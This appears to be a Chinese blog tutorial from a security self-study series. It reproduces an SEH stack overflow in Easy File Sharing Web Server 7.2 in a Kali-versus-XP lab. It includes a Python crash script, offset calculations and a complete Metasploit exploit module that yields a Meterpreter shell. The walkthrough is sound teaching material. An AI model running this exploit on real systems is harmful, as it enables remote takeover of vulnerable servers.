这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了XP和Kali环境搭建,通过Windows漏洞实现栈溢出攻击,通过Metasploit反弹shell,从而Kali系统获取了XP系统的shell。本文将讲解基于SEH异常处理机制的栈溢出漏洞,XP系统通过连接Easy File Sharing Web Server 7.2文件传输服务,然后利用一个恶意的请求头部(HEAD或GET)引起缓冲区溢出,从而改写SEH链的地址并反弹Shell。基础性文章,希望对您有所帮助。
本文的内容包括:
作者作为网络安全的小白,分享一些自学基础教程给大家,主要是关于安全工具和实践操作的在线笔记,希望您们喜欢。同时,更希望您能与我一起操作和进步,后续将深入学习网络安全和系统安全知识并分享相关实验。总之,希望该系列文章对博友有所帮助,写文不易,大神们不喜勿喷,谢谢!如果文章对您有帮助,将是我创作的最大动力,点赞、评论、私聊均可,一起加油喔~
PS:本文参考了安全网站和参考文献中的文章(详见参考文献),并结合自己的经验和实践进行撰写,也推荐大家阅读参考文献。
软件安全:https://github.com/eastmountyxz/Software-Security-Course/tree/master/6-Windows-Vulnerability
其他工具:https://github.com/eastmountyxz/NetworkSecuritySelf-study
工具地址:https://github.com/eastmountyxz/Security-Software-Based
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。
前文学习:
[网络安全自学篇] 一.入门笔记之看雪Web安全学习及异或解密示例
[网络安全自学篇] 二.Chrome浏览器保留密码功能渗透解析及登录加密入门笔记
[网络安全自学篇] 三.Burp Suite工具安装配置、Proxy基础用法及暴库示例
[网络安全自学篇] 四.实验吧CTF实战之WEB渗透和隐写术解密
[网络安全自学篇] 五.IDA Pro反汇编工具初识及逆向工程解密实战
[网络安全自学篇] 六.OllyDbg动态分析工具基础用法及Crakeme逆向
[网络安全自学篇] 七.快手视频下载之Chrome浏览器Network分析及Python爬虫探讨
[网络安全自学篇] 八.Web漏洞及端口扫描之Nmap、ThreatScan和DirBuster工具
[网络安全自学篇] 九.社会工程学之基础概念、IP获取、IP物理定位、文件属性
[网络安全自学篇] 十.论文之基于机器学习算法的主机恶意代码
[网络安全自学篇] 十一.虚拟机VMware+Kali安装入门及Sqlmap基本用法
[网络安全自学篇] 十二.Wireshark安装入门及抓取网站用户名密码(一)
[网络安全自学篇] 十三.Wireshark抓包原理(ARP劫持、MAC泛洪)及数据流追踪和图像抓取(二)
[网络安全自学篇] 十四.Python攻防之基础常识、正则表达式、Web编程和套接字通信(一)
[网络安全自学篇] 十五.Python攻防之多线程、C段扫描和数据库编程(二)
[网络安全自学篇] 十六.Python攻防之弱口令、自定义字典生成及网站暴库防护
[网络安全自学篇] 十七.Python攻防之构建Web目录扫描器及ip代理池(四)
[网络安全自学篇] 十八.XSS跨站脚本攻击原理及代码攻防演示(一)
[网络安全自学篇] 十九.Powershell基础入门及常见用法(一)
[网络安全自学篇] 二十.Powershell基础入门及常见用法(二)
[网络安全自学篇] 二十一.GeekPwn极客大赛之安全攻防技术总结及ShowTime
[网络安全自学篇] 二十二.Web渗透之网站信息、域名信息、端口信息、敏感信息及指纹信息收集
[网络安全自学篇] 二十三.基于机器学习的恶意请求识别及安全领域中的机器学习
[网络安全自学篇] 二十四.基于机器学习的恶意代码识别及人工智能中的恶意代码检测
[网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防御初探
[网络安全自学篇] 二十六.Shodan搜索引擎详解及Python命令行调用
[网络安全自学篇] 二十七.Sqlmap基础用法、CTF实战及请求参数设置(一)
[网络安全自学篇] 二十八.文件上传漏洞和Caidao入门及防御原理(一)
[网络安全自学篇] 二十九.文件上传漏洞和IIS6.0解析漏洞及防御原理(二)
[网络安全自学篇] 三十.文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御(三)
[网络安全自学篇] 三十一.文件上传漏洞之Upload-labs靶场及CTF题目01-10(四)
[网络安全自学篇] 三十二.文件上传漏洞之Upload-labs靶场及CTF题目11-20(五)
[网络安全自学篇] 三十三.文件上传漏洞之绕狗一句话原理和绕过安全狗(六)
[网络安全自学篇] 三十四.Windows系统漏洞之5次Shift漏洞启动计算机
[网络安全自学篇] 三十五.恶意代码攻击溯源及恶意样本分析
[网络安全自学篇] 三十六.WinRAR漏洞复现(CVE-2018-20250)及恶意软件自启动劫持
[网络安全自学篇] 三十七.Web渗透提高班之hack the box在线靶场注册及入门知识
[网络安全自学篇] 三十八.hack the box渗透之BurpSuite和Hydra密码爆破及Python加密Post请求(二)
[网络安全自学篇] 三十九.hack the box渗透之DirBuster扫描路径及Sqlmap高级注入用法(三)
[网络安全自学篇] 四十.phpMyAdmin 4.8.1后台文件包含漏洞复现及详解(CVE-2018-12613)
[网络安全自学篇] 四十一.中间人攻击和ARP欺骗原理详解及漏洞还原
[网络安全自学篇] 四十二.DNS欺骗和钓鱼网站原理详解及漏洞还原
[网络安全自学篇] 四十三.木马原理详解、远程服务器IPC$漏洞及木马植入实验
[网络安全自学篇] 四十四.Windows远程桌面服务漏洞(CVE-2019-0708)复现及详解
[网络安全自学篇] 四十五.病毒详解及批处理病毒制作(自启动、修改密码、定时关机、蓝屏、进程关闭)
[网络安全自学篇] 四十六.微软证书漏洞CVE-2020-0601 (上)Windows验证机制及可执行文件签名复现
[网络安全自学篇] 四十七.微软证书漏洞CVE-2020-0601 (下)Windows证书签名及HTTPS网站劫持
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
[网络安全自学篇] 四十九.Procmon软件基本用法及文件进程、注册表查看
[网络安全自学篇] 五十.虚拟机基础之安装XP系统、文件共享、网络快照设置及Wireshark抓取BBS密码
[网络安全自学篇] 五十一.恶意样本分析及HGZ木马控制目标服务器
[网络安全自学篇] 五十二.Windows漏洞利用之栈溢出原理和栈保护GS机制
[网络安全自学篇] 五十三.Windows漏洞利用之Metasploit实现栈溢出攻击及反弹shell
前文欣赏:
[渗透&攻防] 一.从数据库原理学习网络攻防及防止SQL注入
[渗透&攻防] 二.SQL MAP工具从零解读数据库及基础用法
[渗透&攻防] 三.数据库之差异备份及Caidao利器
[渗透&攻防] 四.详解MySQL数据库攻防及Fiddler神器分析数据包
本实验目的是Kali系统利用Windows XP栈溢出漏洞,以Metasploit溢出bof-server.exe为例,进行攻击及shell反弹。在进行所有实验之前,需要保证虚拟机各系统之间能够相互通信,安装过程详见之前的文章。
第一步,点击“虚拟机”->“设置”。
第二步,将XP和Kali网络连接属性均勾选成“NAT模式”,然后点击确定。
第三步,配置后在kali的shell上用ifconfig命令查看主机IP。
第四步,在Windows的命令行中用ipconfig查看主机IP。
同时,主机Win10系统也能够Ping通虚拟机和Kali系统。
Easy File Sharing Web Server 7.2:github下载地址
第一步,在主机Win10系统中设置共享文件夹,将Easy File Sharing Web Server共享给虚拟机中的XP系统。
它是一种允许访客容易地经由浏览器上传/下载文件的文件分享系统。
第二步,在XP系统中安装该软件。
安装成功之后如下图所示:
第三步,运行Easy File Sharing Web Server,此时URL为XP系统的IP地址(http://192.168.44.130),端口为80和443。注意,左上角“Start”运行该软件。
在进行栈溢出攻击之前,我们首先需要确定溢出点位置。在Kali系统中通过一些方法生成字符串序列,并发送至XP系统让其Easy File Sharing Web Server异常。这里,由于需要将字符序列构造到请求头中,形成"HEAD " + 字符序列 + " HTTP/1.0\r\n\r\n"的格式。
漏洞点:
在处理请求时存在漏洞,一个恶意的请求头部(HEAD或GET)就可以引起缓冲区溢出,从而改写SEH链的地址。基本方法:填充物 +pop pop retn 指令序列地址+shellcode。
第一步,在Kali系统中输入Msfconsole打开msf。
msfconsole
第二步,输入search ms08-067查找漏洞。大家简单了解其功能,后续会写一篇文章专门分享。
search ms08-067
第三步,使用Metasploit中的pattern_create.rb脚本生成字符序列并存储至1.txt文件。
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 10000 > 1.txt
查看创建的“1.txt”如下图所示:
第四步,通过Python创建“ HTTP/1.0\r\n\r\n”,并拼接成文件“3.txt”。
python -c "print(' HTTP/1.0\r\n\r\n')" > 2.txt
cat 1.txt 2.txt > 3.txt
补充Linux cat命令:
cat 命令用于连接文件并打印到标准输出设备上
- (1) 将textfile1文档内容加上行号后输入textfile2文档
cat -n textfile1 > textfile2- (2) textfile1和textfile2文档内容加上行号(空白行不加)后将内容附加到textfile3文档里
cat -b textfile1 textfile2 >> textfile3- (3) 清空/etc/test.txt文档内容
cat /dev/null > /etc/test.txt
此时输出结果如下图所示:
注意,后续第五部分我们将发送该文件至远程XP服务器。
Immunity Debbuger软件:github下载地址
第一步,启动Easy File Sharing Web Server 7.2并将进程加载到Immunity Debbuger中。
第二步,打开Immunity Debugger软件,点击“File”->“Attach”,显示目标机上运行的所有进程。
第三步,查看XP系统上的所有进程,找到名称为Easy File Sharing Web Server 7.2所在的进程,并选中该进程单击右下角的Attach按钮。
此时,显示Easy File Sharing Web Server 7.2程序的运行状态如下:
第四步,将Immunity Debugger开启为运行状态。
Immunity Debugger右下角为Paused,说明Easy File Sharing Web Server 7.2加载到ImmunityDebugger中处于暂停状态。
第五步,单击Play按钮让程序处于运行状态。
此时,看到Immunity Debugger右下角为运行状态。到此,我们已经将Easy File Sharing Web Server 7.2加载到Immunity Debugger中,并处于运行状态。
接着我们回到Kali系统,尝试将“3.txt”文件发送给XP服务器,其IP地址为192.168.44.130,端口号为80。需要注意,Easy File Sharing Web Server 7.2软件处于运行监听状态。
但作者总是报错“Connection closed by foreign host”,而且未解决,哎,能力还是不足啊!为了继续试验,我学习了冰河老师的文章,采用Python脚本发送远程请求。
参考文章:渗透之——使用Metasploit实现基于SEH的缓冲区溢出攻击 - 冰河老师
第一步,撰写Python脚本代码,详见exploit_seh.py文件。
# Exploit Title: Easy File Sharing Web Server 7.2 - HEAD HTTP request SEH Buffer Overflow
# Date: 2019-01-16
# Exploit Author: binghe
# Version: 7.2
# Tested on: XP SP3 EN
# category: Remote Exploit
# Usage: ./exploit.py ip port
import socket
import sys
host = str(sys.argv[1])
port = int(sys.argv[2])
a = socket.socket()
print "Connecting to: " + host + ":" + str(port)
a.connect((host,port))
entire=4500
# Next SEH
buff = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab......"
# HEAD
a.send("HEAD " + buff + " HTTP/1.0\r\n\r\n")
a.close()
print "Done..."
该Python脚本中buff变量为我们通过Metasploit从pattern_create.rb文件生成的10000个字符,复制即可;接收的两个变量为IP地址和端口号。注意,作者已将该脚本及所有实验软件上传至我的Github软件安全实验6中,请读者下载。
第二步,将脚本文件发送至Kali系统。
常见的主机Win10、虚拟机XP系统与Kali系统相互交互和传输文件方法为:
第三步,运行Python脚本文件,发送 “HEAD " + buff + " HTTP/1.0\r\n\r\n” 给XP系统服务器,并导致缓冲区溢出。
python ./exploit_seh.py 192.168.44.130 80
经过以下步骤:
此时,在XP系统Immunity Debugger软件中单击“View”->“SEH chain”。
输出结果如下图所示,可以看到SEH链(结构化异常处理)。这就是Easy File Sharing Web Server 7.2的溢出地址。
第一步,计算Catch块偏移量。
msf5 > /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 46356646 -l 10000
[*] Exact match at offset 4065
第二步,计算下一条SEH记录偏移量。
msf5 > /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 34664633 -l 10000
[*] Exact match at offset 4061
对应的Kali系统MSF控制台命令运行结果如下:
记住两个偏移量:4065和4061。
接着我们需要使用Immunity Debugger的插件Mona,将Python脚本下载并复制到安装的文件夹下。下载地址:https://github.com/corelan/mona
第一步,将mona.py复制到XP系统目录。
第二步,在Immunity Debugger命令行下输入如下“!mona modules”命令启动Mona分析DLL文件。
!mona modules
第三步,从输出很多DLL文件中找到ImageLoad.dll文件,并导出复制至Kali系统。
需要注意,我们需要POP/POP/RET指令的地址来载入下一条SEH记录的地址,并跳转到攻击载荷。这需要一个外部的DLL文件载入一个地址,不过现在大多数最先进的操作系统都使用SafeSEH保护机制来编译DLL,因此我们需要一个没有被SafeSEH保护的DLL模块的POP/POP/RET指令地址,即ImageLoad.dll。
将XP系统C:…\Easy File Sharing Web Server\ImageLoad.dll复制到Kali系统。
第一步,上传ImageLoad.dll到Kali系统,这里为主目录。
注意,作者采用的是百度云网盘在虚拟机、主机之间共享文件。
第二步,使用Metasploit的msfbinscan工具,查看ImageLoad.dll的POP/POP/RET指令序列。
msfconsole
msf > msfbinscan -p ./ImageLoad.dll
可以看到ImageLoad.dll的POP/POP/RET指令序列如下:
由于POP/POP/RET的指令太多,我只列出了部分指令序列信息。最后,我们就可以编写Metasoloit渗透SEH的脚本了。
第一步,编写Ruby自动化攻击脚本。
seh_attack.rb
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Easy File Sharing HTTP Server 7.2 SEH Overflow',
'Description' => %q{
This Module Demonstrate SEH based overflow example
},
'Author' => 'yanhan',
'Payload' =>
{
'Space' => 390,
'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e"
},
'Platform' => 'Windows',
'Targets' =>
[
[
'Easy File Sharing 7.2 HTTP',
{
'Ret' => find it,
'Offset' => find it
}
]
],
'DisclosureDate' => '2019-01-16',
))
end
def exploit
connect
weapon = "HEAD "
weapon << make_nops(target['Offset'])
weapon << generate_seh_record(target['Ret'])
weapon << make_nops(20)
weapon << payload.encoded
weapon << " HTTP/1.0\r\n\r\n"
sock.put(weapon)
handler
disconnect
end
end
第二步,由于Msfbinscan返回很多地址,依次进行尝试,最终确定Ret为0x10022fd7,Offset为之前的4061,并修改脚本中的两个参数。
经过尝试0x10022fd7可以使用。Ret的值要和SEH栈溢出指令的地址一致,Offset的值要和第七步中找出的准确字节数一致。对应如下:
第三步,将seh_attack.rb脚本上传到Kali的/usr/share/metasploit-framework/modules/exploits/windows/meterpreter/目录下。
cp ./seh_attack.rb /usr/share/metasploit-framework/modules/exploits/windows/meterpreter/
cd /usr/share/metasploit-framework/modules/exploits/windows/meterpreter/
ls
第四步,运行攻击脚本并拿到了目标服务器的Meterpreter Shell。
第五步,调用exploit命令对栈溢出漏洞进行攻击。再输入ls,可以看到我们目标XP服务器的E盘内容已经被提权,这就是所谓的Windows漏洞利用。
补充谢公子大神的Exploit内容:
上面“ls”命令对应的内容即为XP系统桌面的文件,如下图所示:
需要注意,我们在执行这些操作过程中,XP系统的服务需要一直运行,处于监听状态。某些情况可能会提示错误“Exploit completed, but no session was created”,建议大家在目标机上多运行几次服务和在Kali上多运行几次exploit,直到成功拿到Meterpreter Shell。
文章写到这里,就介绍完毕,希望文章对您有所帮助,尤其是文章扩展的几个工具,您下来也可以详细学习。这篇文章主要讲解了如果搭建XP和Kali环境,并实现基于SEH异常处理机制的栈溢出漏洞,通过Metasploit反弹shell,从而Kali系统获取了XP系统的shell。其原理是利用一个恶意的请求头部(HEAD或GET)引起缓冲区溢出,从而改写SEH链的地址并反弹Shell。该栈溢出的具体流程包括:
虽然是非常基础的一篇文章,但希望读者阅读并完成文章的实验。接下来作者将继续学习并分享更多的Windows漏洞利用或网络安全的文章。最后给出相关的命令。
希望这系列文章对您有所帮助,真的感觉自己技术好菜,要学的知识好多。这是第54篇原创的安全系列文章,从网络安全到系统安全,从木马病毒到后门劫持,从恶意代码到溯源分析,从渗透工具到二进制工具,还有Python安全、顶会论文、黑客比赛和漏洞分享。未知攻焉知防,人生漫漫其路远兮,作为初学者,自己真是爬着前行,感谢很多人的帮助,继续爬着,继续加油!
欢迎大家讨论,是否觉得这系列文章帮助到您!如果存在不足之处,还请海涵。任何建议都可以评论告知读者,共勉~
武汉加油!湖北加油!中国加油!!!
(By:Eastmount 2020-03-02 凌晨1点写于贵阳 http://blog.csdn.net/eastmount )
参考文献:
[1] 《软件安全》课程Windows漏洞利用实验 YH师弟
[2] https://github.com/corelan/mona
[3] 解读Linux安全机制之栈溢出保护 - macwe
[4] 渗透之——使用Metasploit实现基于SEH的缓冲区溢出攻击 - 冰河大神
[5] Metasploit Framework(MSF)的使用 - 谢公子
[6] msfconsole 控制台使用和操作 - xianjie0318
[7] smb(ms17-010)远程命令执行之msf - backlion
[8] https://github.com/eastmountyxz/Security-Software-Based
[9] Easy File Sharing Web Server 7.2 漏洞分析及利用 - 午夜红云
[10] 栈溢出笔记1.10 基于SEH的栈溢出 - hustd10
[11] https://github.com/eastmountyxz/Software-Security-Course